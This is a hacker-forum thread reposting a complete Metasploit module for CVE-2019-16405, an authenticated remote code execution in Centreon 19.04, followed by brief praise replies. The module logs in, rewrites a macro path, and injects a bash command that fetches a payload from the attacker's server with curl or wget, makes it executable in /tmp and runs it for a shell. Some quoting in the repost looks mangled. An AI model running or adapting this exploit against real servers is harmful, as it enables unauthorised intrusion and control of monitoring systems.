请选择 进入手机版 | 继续访问电脑版

落羽黑客论坛

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 106|回复: 5

Centreon 19.04 - Authenticated Remote Code Execution

[复制链接]

66

主题

68

帖子

226

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
226
发表于 2021-2-8 15:39:05 | 显示全部楼层 |阅读模式
Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)
  1. ####################################################################
  2. # This module requires Metasploit: https://metasploit.com/download #
  3. #  Current source: https://github.com/rapid7/metasploit-framework  #
  4. ####################################################################

  5. class MetasploitModule < Msf::Exploit::Remote
  6.   Rank = NormalRanking

  7.   include Msf::Exploit::Remote::HttpClient
  8.   include Msf::Exploit::Remote::HttpServer::HTML
  9.   include Msf::Exploit::EXE

  10.   def initialize(info = {})
  11.     super(update_info(info,
  12.         "Name" => "Centreon Authenticated Macro Expression Location Setting Handler Code Execution",
  13.         "Description" =>  %q{
  14.           Authenticated Remote Code Execution on Centreon Web Appliances.
  15.           Affected versions: =< 18.10, 19.04
  16.           By amending the Macros Expression's default directory to / we are able to execute system commands and obtain a shell as user Apache.
  17.           Vendor verified: 09/17/2019
  18.           Vendor patched: 10/16/2019
  19.           Public disclosure: 10/18/2019
  20.         },
  21.         "License" => MSF_LICENSE,
  22.         'Author' => [
  23.           'TheCyberGeek', # Discovery
  24.           'enjloezz' # Discovery and Metasploit Module
  25.         ],
  26.         'References' =>
  27.         [
  28.             ['URL','https://github.com/centreon/centreon/pull/7864'],
  29.             ['CVE','2019-16405']
  30.         ],
  31.         "Platform" => "linux",
  32.         "Targets" => [
  33.           ["Centreon", {}],
  34.         ],
  35.         "Stance" => Msf::Exploit::Stance::Aggressive,
  36.         "Privileged" => false,
  37.         "DisclosureDate" => "Oct 19 2019",
  38.         "DefaultOptions" => {
  39.           "SRVPORT" => 80,
  40.         },
  41.         "DefaultTarget" => 0
  42.       ))

  43.     register_options(
  44.       [
  45.         OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
  46.         OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]),
  47.         OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]),
  48.         OptString.new("TARGETS", [true, "The method used to download shell from target (default is curl)", "curl"]),
  49.         OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
  50.       ]
  51.     )
  52.   end

  53.   def exploit
  54.     begin
  55.       res = send_request_cgi(
  56.         "uri" => normalize_uri(target_uri.path, "index.php"),
  57.         "method" => "GET",
  58.       )
  59.       @phpsessid = res.get_cookies
  60.       /centreon_token".*value="(?<token>.*?)"/ =~ res.body

  61.       unless token
  62.         vprint_error("Couldn't get token, check your TARGETURI")
  63.         return
  64.       end
  65.       res = send_request_cgi!(
  66.       "uri" => normalize_uri(target_uri.path, "index.php"),
  67.       "method" => "POST",
  68.       "cookie" => @phpsessid,
  69.       "vars_post" => {
  70.         "useralias" => datastore["USERNAME"],
  71.         "password" => datastore["PASSWORD"],
  72.         "centreon_token" => token,
  73.         },
  74.       )
  75.       unless res.body.include? "You need to enable JavaScript to run this app"
  76.         fail_with Failure::NoAccess "Cannot login to Centreon"
  77.       end
  78.       print_good("Login Successful!")
  79.       res = send_request_cgi(
  80.         "uri" => normalize_uri(target_uri.path, "main.get.php"),
  81.         "method" => "GET",
  82.         "cookie" => @phpsessid,
  83.         "vars_get" => {
  84.           "p" => "60904",
  85.           "o" => "c",
  86.           "resource_id" => 1,
  87.         },
  88.       )
  89.       /centreon_token".*value="(?<token>.*?)"/ =~ res.body
  90.       res = send_request_cgi(
  91.         "uri" => normalize_uri(target_uri.path, "main.get.php"),
  92.         "vars_get" => {
  93.           "p" => "60904",
  94.           },
  95.         "method" => "POST",
  96.         "cookie" => @phpsessid,
  97.         "vars_post" => {
  98.           "resource_name": "$USER1$",
  99.           "resource_line": "/",
  100.           "instance_id": 1,
  101.           "resource_activate": 1,
  102.           "resource_comment": "Nagios Plugins Path",
  103.           "submitC": "Save",
  104.           "resource_id": 1,
  105.           "o": "c",
  106.           "initialValues": "" "a:0:{}" "",
  107.           "centreon_token": token
  108.         },
  109.       )
  110.       begin
  111.         Timeout.timeout(datastore["HTTPDELAY"]) { super }
  112.       rescue Timeout::Error
  113.         vprint_error("Server Timed Out...")
  114.       end
  115.     rescue ::Rex::ConnectionError
  116.       vprint_error("Connection error...")
  117.     end
  118.   end

  119.   def primer
  120.     @pl = generate_payload_exe
  121.     @path = service.resources.keys[0]
  122.     binding_ip = srvhost_addr

  123.     proto = ssl ? "https" : "http"
  124.     payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}"
  125.     send_payload(payload_uri)
  126.   end

  127.   def send_payload(payload_uri)
  128.     payload = "/bin/bash -c "" + ( datastore["method"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O") ) + " /tmp/#{@path}""
  129.     print_good("Sending Payload")
  130.     send_request_cgi(
  131.       "uri" => normalize_uri(target_uri.path, "main.get.php"),
  132.       "method" => "POST",
  133.       "cookie" => @phpsessid,
  134.       "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 },
  135.     )
  136.   end

  137.   def on_request_uri(cli, req)
  138.     print_good("#{peer} - Payload request received: #{req.uri}")
  139.     send_response(cli, @pl)
  140.     run_shell
  141.     stop_service
  142.   end

  143.   def run_shell
  144.     print_good("Setting permissions for the payload")
  145.     res = send_request_cgi(
  146.       "uri" => normalize_uri(target_uri.path, "main.get.php"),
  147.       "method" => "POST",
  148.       "cookie" => @phpsessid,
  149.       "vars_get" => {
  150.         "p": "60801",
  151.         "command_hostaddress": "",
  152.         "command_example": "",
  153.         "command_line": "/bin/bash -c "chmod 777 /tmp/#{@path}"",
  154.         "o": "p",
  155.         "min": 1,
  156.       },
  157.     )

  158.     print_good("Executing Payload")
  159.     res = send_request_cgi(
  160.       "uri" => normalize_uri(target_uri.path, "main.get.php"),
  161.       "method" => "POST",
  162.       "cookie" => @phpsessid,
  163.       "vars_get" => {
  164.         "p": "60801",
  165.         "command_hostaddress": "",
  166.         "command_example": "",
  167.         "command_line": "/tmp/#{@path}",
  168.         "o": "p",
  169.         "min": 1,
  170.       },
  171.     )
  172.   end
  173. end
复制代码


回复

使用道具 举报

0

主题

5

帖子

33

积分

新手上路

Rank: 1

积分
33
发表于 2021-2-8 15:39:15 | 显示全部楼层
非常好!!
回复

使用道具 举报

0

主题

1

帖子

37

积分

新手上路

Rank: 1

积分
37
发表于 2021-2-8 15:39:25 | 显示全部楼层
转发了!!
回复

使用道具 举报

0

主题

1

帖子

27

积分

新手上路

Rank: 1

积分
27
发表于 2021-2-8 15:39:32 | 显示全部楼层
顶一下!!
回复

使用道具 举报

0

主题

4

帖子

14

积分

新手上路

Rank: 1

积分
14
发表于 2021-2-8 15:39:41 | 显示全部楼层
不错!!
回复

使用道具 举报

0

主题

5

帖子

39

积分

新手上路

Rank: 1

积分
39
发表于 2021-2-8 15:39:55 | 显示全部楼层
太棒了!!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|手机版|落羽黑客论坛

GMT+8, 2021-4-20 12:26 , Processed in 0.045594 second(s), 24 queries .

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表